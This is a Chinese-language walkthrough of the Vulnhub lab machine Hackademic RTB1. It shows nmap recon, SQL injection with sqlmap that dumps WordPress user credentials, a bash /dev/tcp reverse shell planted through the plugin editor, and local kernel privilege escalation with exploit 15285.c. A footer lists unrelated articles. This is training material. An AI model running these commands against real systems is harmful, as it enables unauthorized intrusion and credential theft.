Vulnhub靶机系列 Hackadmeic.RTB1

news2024/11/24 11:55:54

系列:Hackademic(此系列共2台)
难度:初级

信息收集

主机发现

netdiscover -r 192.168.80.0/24

image-20230819150242058

端口扫描

nmap -A -p- 192.168.80.143

image-20230819151707785

访问80端口

image-20230819151453856

使用指纹识别插件查看是WordPress

image-20230819151946799

根据首页显示的内容,点击target

image-20230819152040904

image-20230819152140328

点击 页面能点击的链接,发现点击Uncategorized的时候,链接变成了

http://192.168.80.143/Hackademic_RTB1/?cat=1

image-20230819152319809

尝试有无SQL注入,在?cat=1后加上',发现有SQL语句的报错信息,可以判断有SQL注入漏洞

image-20230819152424365

目录扫描

单纯的爆破IP地址,扫描不出有用的目录信息

dirsearch -u http://192.168.80.143 -i 200   

image-20230819164419748

开始是直接扫了IP,现在多了一个目录/Hackademic_RTB1/,那么直接扫该目录

dirsearch -u http://192.168.80.143/Hackademic_RTB1/ -i 200

image-20230819164354082

漏洞利用

sqlmap

查看都有哪些数据库

sqlmap -u "192.168.80.143/Hackademic_RTB1/?cat=1" --dbs --batch 

image-20230819152623542

获取所有表

sqlmap -u "192.168.80.143/Hackademic_RTB1/?cat=1" -D wordpress --tables --batch

image-20230819152737643

获取该表的所有字段

sqlmap -u "192.168.80.143/Hackademic_RTB1/?cat=1" -D wordpress -T wp_users  --columns --batch 

image-20230819152939501

获取想要的数据

sqlmap -u "192.168.80.143/Hackademic_RTB1/?cat=1" -D wordpress -T wp_users  -C user_login,user_pass --dump

image-20230819153048717

登录后台192.168.80.143/Hackademic_RTB1/wp-admin/

image-20230819164537854

使用一个用户密码登录 NickJames密码:admin

image-20230819165028767

登上 之后没有什么能够 利用的,尝试换一个用户登录看看

用户:GeorgeMiller密码q1w2e3,发现在Plugins选项里有一个Plugin Editor编辑的地址,加入反弹shell

system("bash -c 'sh -i &>/dev/tcp/192.168.80.132/8989 0>&1'");

image-20230819184510299

kali开启监听

nc -lvvp 8989

提交之后就得要知道上文的 路径,找出路径才能触发反弹shell


找到提交路径方式一:


wordpress上传的文件默认是存储在目录/wp-content/uploads中,Uploads文件夹中包括所有你上传的图片,视频和附件。

WordPress文件夹内,你会发现大量的代码文件和3个文件夹**wp-admin wp-content wp-includes**

wp-admin 没错,这是你的仪表板你登陆wordpress后看到的界面,包括所有的后台文件

wp-content包含你所有的内容,包括插件 , 主题和您上传的内容

Plugins文件夹包含所有插件。 每个插件都有一个自己的文件夹。 如Aksimet坐在Akismet在文件夹内

同样,theme主题文件夹保存你所有的主题。 插件一样,每个主题有单独的文件夹。

Uploads文件夹,所有你上传图片,视频和附件。

languages是关于语言的

wp-includes包括持有的所有文件和库,是必要的WordPress管理,编辑和JavaScript库,CSS和图像fiels

在爆破目录的时候发现有一个wp-content目录,可以访问一下看看

image-20230819171036292

页面显示如下

http://192.168.80.143/Hackademic_RTB1/wp-content/

image-20230819171102568

刚在又是在Plugins选项里的Plugin Editor编辑的反弹shell,刚在Plugin Editor编辑页面也显示了说正在编辑hello.php

image-20230819184413751

所以在http://192.168.80.143/Hackademic_RTB1/wp-content/页面中点击plugins

image-20230819171841864

image-20230819171903184

就看到了hello.php,点击hello.php触发反弹shell (耐心等待-----------------)

image-20230819172020273

内核提权

查看内核版本

uname -a

image-20230819180019128

新开一个终端搜索该版本的漏洞

searchsploit 2.6.3 | grep "Local Privilege Escalation"

image-20230819180245056

查看完整路径

searchsploit -p linux/local/15285.c 

image-20230819180544957

把这个15285.c复制到apache服务的根路径/var/www/html

sudo cp  /usr/share/exploitdb/exploits/linux/local/15285.c  /var/www/html/15285.c

启动apache服务

systemctl restart apache2.service

image-20230819184303398

gcc 15285.c -o exp

# 将15285.c预处理、汇编、编译并链接形成可执行文件exp

#-o选项用来指定输出文件的文件名

15285.c预处理、汇编、编译并链接形成可执行文件exp

-o选项用来指定输出文件的文件名


image-20230819185040509

在这里插入图片描述

闯关成功!!!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/902458.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

(已解决)PySpark : AttributeError: ‘DataFrame‘ object has no attribute ‘iteritems‘

AttributeError: ‘DataFrame’ object has no attribute ‘iteritems’ 原因在使用SparkSession对象中createDataFrame函数想要将pandas的dataframe转换成spark的dataframe时出现的 因为createDataFrame使用了新版本pandas弃用的iteritems(),所以报错 解决办法&…

webSocket 开发

1 认识webSocket WebSocket_ohana!的博客-CSDN博客 一,什么是websocket WebSocket是HTML5下一种新的协议(websocket协议本质上是一个基于tcp的协议)它实现了浏览器与服务器全双工通信,能更好的节省服务器资源和带宽…

这些Linux基础命令你总得掌握吧

B站|公众号:啥都会一点的研究生 写在前面 很多深度学习/机器学习/数据分析等领域(或者说大多数在Python环境下进行操作的领域)的初学者入门时是在Windows上进行学习,也得益于如Anaconda等工具把环境管理做的如此友善 但如果想在…

阿里网盘海外使用速度很慢

小虎最近在HK使用阿里云盘,速度突然变得很慢,但是百度的没问题。查了发现是阿里的DNS做的不好,所以换了一个DNS速度就上来了。 解决方案 在这个网站:[原创工具] DNS优选(挑选最合适的DNS服务器,拒绝DNS劫下载DNS推荐工具&#x…

如何取消订阅IEEE membership的email

最近小虎开了一个IEEE Student Member,邮箱都快被IEEE给爆箱了。所以想办法取消订阅其邮件,但是保留其member身份。 方法 在profile界面选择communication preferences and policies, Uncheck所有communications,选择I only want to recei…

Flink内核源码解析--Flink中重要的工作组件和机制

Flink内核源码 1、掌握Flink应用程序抽象2、掌握Flink核心组件整体架构抽象3、掌握Flink Job三种运行模式4、理解Flink RPC网络通信框架Akka详解5、理解TaskManager为例子,分析Flink封装Akka Actor的方法和整个调用流程6、理解Flink高可用服务HighAvailabilityServ…

Spring Cloud Alibaba -微服务架构(二)

1. 微服务架构介绍 微服务架构, 简单的说就是将单体应用进一步拆分,拆分成更小的服务,每个服务都是一个可以独立运行的项目。 1.1 微服务架构的常见问题 一旦采用微服务系统架构,就势必会遇到这样几个问题: 这么多小…

最长回文子序列——力扣516

动态规划 int longestPalindromeSubseq(string s){int n=s.length();vector<vector<int>>

聊聊智慧城市的发展

目录 1.智慧城市应该是什么样子 2.智慧城市的实现方案 3.智慧城市会给人们造成的影响 1.智慧城市应该是什么样子 智慧城市是一种基于信息和通信技术的先进城市管理模式&#xff0c;旨在提高城市的运行效率、居民生活质量和可持续发展。智慧城市整合了各种智能设备、传感器、…

segment anything in high quality

致力于解决细节分割不好的情况&#xff0c;可以理解为sam的精细分割的微调版本&#xff0c;但是对原始的分割能力也没有丢失&#xff0c;有点像目标检测中的小目标检测优化算法。总的来说&#xff0c;在原始的sam上增加了hq-features和hq output token以及mlp&#xff0c;来做h…

【MySQL面试题(66道)】

文章目录 MySQL面试题(66道)基础1.什么是内连接、外连接、交叉连接、笛卡尔积呢&#xff1f;2.那 MySQL 的内连接、左连接、右连接有有什么区别&#xff1f;3.说一下数据库的三大范式&#xff1f;4.varchar 与 char 的区别&#xff1f;5.blob 和 text 有什么区别&#xff1f;6.…

【三次握手】TCP三次握手由入门到精通(完整版)

⬜⬜⬜ &#x1f430;&#x1f7e7;&#x1f7e8;&#x1f7e9;&#x1f7e6;&#x1f7ea;(*^▽^*)欢迎光临 &#x1f7e7;&#x1f7e8;&#x1f7e9;&#x1f7e6;&#x1f7ea;&#x1f430;⬜⬜⬜ ✏️write in front✏️ &#x1f4dd;个人主页&#xff1a;陈丹宇jmu &am…

EndNote(三)【阅读+批注、插入文献】

将文献导入EndNote了&#xff0c;右侧就能看当前文献的内容了,比如preview、pdf查看等&#xff1a; 当然&#xff0c;如果你觉得这样看有点不大气哈哈&#xff0c;你可以双击&#xff1a;&#xff08;这是第一种方法&#xff09; 他就会弹出一个窗口&#xff1a; &#xff08;这…

要跟静音开关说再见了!iPhone15新变革,Action按钮引领方向

有很多传言称iPhone 15 Pro会有很多变化&#xff0c;但其中一个变化可能意味着iPhone体验从第一天起就有的一项功能的终结。我说的是静音开关&#xff0c;它可以让你轻松地打开或关闭iPhone的铃声。 根据越来越多的传言&#xff0c;iPhone 15 Pro和iPhone 15 Pro Max将拆除静音…

C++------利用C++实现二叉搜索树【数据结构】

文章目录 二叉搜索树概念二叉搜索树的操作查找插入删除 二叉搜索树的应用 二叉搜索树 概念 什么是二叉搜索树&#xff0c;二叉搜索树就是指左孩子永远比根小右孩子永远比根大。这个规则适用于所有的子树。 上面的就是一棵二叉搜索树&#xff0c;我们还可以发现这棵树走一个中…

C语言之整数_数据存储篇(1)

目录 数据类型 整形家族 浮点型家族 构造类型 指针类型 空类型 整形在内存中的存储&#xff08;原反补&#xff09; NO1. NO2. NO3. NO4. NO5. NO6. 大端小端字节序 NO.1 NO.2 NO.3 NO.4 练习题 NO1. NO2. NO3. NO4. NO5. NO6. 总结 数据类型 …

Unity 之 变量修饰符public 与private 以及默认

文章目录 publicprivate默认情况的成员变量 public 当在Unity中使用public修饰符时&#xff0c;它将变量声明为公共变量&#xff0c;这意味着该变量可以在Unity编辑器中进行设置&#xff0c;并且可以从其他脚本中访问和修改。公共变量在Unity中广泛用于在脚本之间共享数据&…

4.Linux下Cmake交叉编译Qt项目到Jetson Orin Nano(arm)

由于3&#xff1a;Ubuntu上配置QT交叉编译环境并编译QT程序到Jetson Orin Nano&#xff08;ARM&#xff09;_月上林梢的博客-CSDN博客 这一篇文章只用手动配置&#xff0c;一直在点、点、点。比较 LOW&#xff0c;现在在Ubuntu上使用Cmake实现交叉编译QT程序到Jetson Orin Nano…

电脑技巧:电脑关机、休眠、睡眠之间如何选择,看完你就懂了

目录 一、关机、休眠、睡眠的区别&#xff1f; 1.关机 2.休眠 休眠的优点 休眠的缺点 3.睡眠 睡眠的优点 睡眠的缺点 二、什么时候关机/休眠/睡眠&#xff1f; 什么时候需要关机&#xff1f; 什么情况下使用休眠模式&#xff1f; 什么情况下使用睡眠模式&…

Linux之维护基本存储空间

目录 维护基本存储空间 1.查看磁盘信息&#xff08;块设备&#xff09;信息 2.创建分区 (1)MBR分区 标准MBR结构如下 为什么MBR最多只能有4个主分区 (2)GPT分区 优点 3.分区工具 1.使用fdisk管理MBR分区 语法格式 参数及作用 2.使用gdisk管理GPT分区 操作步骤 3.使用pa…